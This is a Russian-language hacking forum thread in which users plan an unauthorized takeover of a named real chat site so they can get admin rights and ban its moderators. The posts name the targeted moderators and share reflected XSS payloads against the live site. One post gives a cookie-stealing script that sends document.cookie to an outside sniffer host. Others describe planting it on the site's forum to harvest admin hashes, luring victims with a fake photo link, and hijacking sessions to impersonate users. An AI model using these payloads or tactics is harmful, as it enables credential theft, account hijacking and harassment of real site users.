проверьте чат на уязвимость
 

Проверьте http://chat.scn.ru на уязвимость.
Подскажите как в нем получить права администратора, он там бывает очень редко все правосудие решат модераторы. Я здесь на форуме видал скрипты для получения прав, ни чего не помогает. Сам я уже давно пытаюсь с ним чего нибудь сделать, пока без результатно, видимо у меня пока не хватает знаний.
Подскажите как в этом чате забанить модератора.

Напиши ники кого нибудь из модераторов или ник админа..

чат кажется вудувский. только пассивные xss и флудеры. а вот форум phpBB, ищи в уязвимостях форума. реально поиметь кукисы админов.

Ник админа: андр или андр. Он там не бавыет, но раз в пол года может и заглянет.
Модераторы: их там половина всех пользователей чата.
Raydeln - самый главный, банит с поводом и без.
Baggi, Raph, ABC, Inserf, ... - в основном банят если того заслуживают.

что значит вудувский

что значит пассивные xss

Так с.. С Raydeln мы с Антошкой2003 уже познакомились)
Вот есть такая фишка
_http://chat.scn.ru/index.php?session=366b076ea4992e9fb9403f1a4794296a &go=<script>alert('Yo')</script>
Вылетает на главную страницу, но с интересными надписями) Ещё пока что не знаю как использовать

Эта такая семья чатов) Voodoo
Кароч внизу ссылка) Я немного не так сказал)

http://www.forum.antichat.ru/thread7476.html
вот здесь всё подробно написано

_http://chat.scn.ru/index.php?session=366b076ea4992e9fb9403f1a4794296a &go=<script>alert('XSS')</script>
Всё, алерт вызвал.. Вылетал у меня на главную, при другом браузере.. На осле алерт успешно запустился..
Втыкай сниффер, и жди админа :)

алерт в чате запустился?

Нет, на пустой странице.. У тебя алерт запустился?
Вот результат, на осле:
_http://img119.imageshack.us/img119/4691/snap13nc.jpg

я не проверял ещё.
занят сейчас, ещё сижу жду хэши с форума.

что такое аплет
что делать с этой сесией, тем более эдесь твой шел у меня он не пойдет

еще вопрос: как втыкать ваш снифер
в строку отправки сообщений втыкал выдает просто ссылку этого снифера кот я ввел.
или в строку браузера - толку то же нет
что я делаю не так

ошибка не шел, а хэш

http://antichat.ru/sniff/
аЛЕрт, учим JavaScript...
она тебе не нужна..
Я проверял на себе, у знакомого тоже алерт вылазил нормально.. Всё пойдёт..

как это определить

Где то информация зашита в теле страницы, где то способствует личный опыт) Я сразу не определил что этот чат Voodoo, Антошка2003 определил) Что говорит о том что опыта больше.. А так вообще ходи по разным чатам, и уже будешь сам их определять в лёгкую..

каждый чат отличаеться друг от друга и это брасаеться в глаза.
в некоторых чатах написано что то вроде Powered by voodoo например.

Антошка2003, получил хэши?:)

нет ещё. сам сижу обновляю сниффер каждые 10 минут.

т.е. можно вот эту ссылку
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
вставить в строку куда надо вводить адрес фотки, а место s.jpg написать реальный адрес фотки и звать всех заценить мою фотку

что делать с
http://chat.scn.ru/index.php?session...403f1a4794296a &go=<script>alert('XSS')</script>

куда ты вводил адрес снифера
чет я сним совсем запутался

если снифер выдает хэши => можно писать от друголи лица, проверьте это в этом чате

адресс сниффера я вводил в форум. теперь сижу и жду когда либо этот модер, либо админ откроет сообщение и тогда мне придёт его хэш.
если расшифруем хэш, то получим пароль, авторизировавшись логином владельца хэша, мы с можем писать от его лица.

постой куда именно и как ты вводил сниф в форуме и куда и как его вводить в чате из статьи я этого не понял

а нельзя просто скопировать форму отправки сообщений и свой хэш заменить на его, и отправлять сообщения неавторизовавшись

может просто сказать в чате что в форуме замутил клевую тему (якобы зацените)

Антошка2003, если не в лом, проверь алерт.. у меня некоторые подозрения насчёт него..
_http://chat.scn.ru/index.php?session=366b076ea4992e9fb9403f1a4794296a &go=<script>alert('XSS')</script>
Долго хэши ждать прийдётся)

как вставлять в фрум читай здесь - http://www.forum.antichat.ru/thread12610.html
в чате на каждый вход даёться разная сессия, если авторизироваться его сессией, то может что то и выйдет. как сессию перехватывать смотри этот раздел, была тема о взломе вуду чатов.
попробуй скажи что замутили клёвую тему.

я попозже попробую с алертами, сейчас не могу пока что. но так кажется что он ничего не даст, но нужно посмотреть, может как и можно будет применить.

[QUOTE=sL(IP)--!(P.i.N.)

Долго хэши ждать прийдётся)[/QUOTE]

я писал про чат в форуме я его не видел
Rayden всем заправляет, он в форуме часть бывает

ruh, ясн..
Оффтопик:
Rayden отключил меня на неделю, причина: наш чат не ломается
лол)

опечатка:
часто бывает

как он тебя спалил

подведем итоги:

Я носки не стал менять, вот и спалил)

я серьезно


и почему на счет аплета ответ был учим, а не учи

Я тоже йопт) Нафлудили 4 страницы...(
Носки=прокси.. ясно?)
1. аЛЕРт
2. жжош, не придирайся к словам) а то тему нахъ закроют за непомерный флуд

так какой вывод по чату в общем:
1. получить права админа(модератора)
2. забанить модератора
3. что мне может дать та ссылка с xss

4. можно ли в этом чате читать приваты

ваше мнение и общие выводы по этому чату

согласны ли вы с Rayden по поводу не возможности взлома данного чата

Йопт, чат ломают не молотком..
Антошка2003, залил сниффер на форум, прийдут хэши, тогда и видно будет..
Потерпи немного, не на пожар..

Так ребята я только что заметил тему прошолся по чату , тама ешё в чате есть КСС , боковой фрейм где ники, внезу (Фотографии),открываем и видем напись (Введите текст для поиска или ник:), ставим <script>alert()</script>, вылетает алерт, можна и им воспользоватся.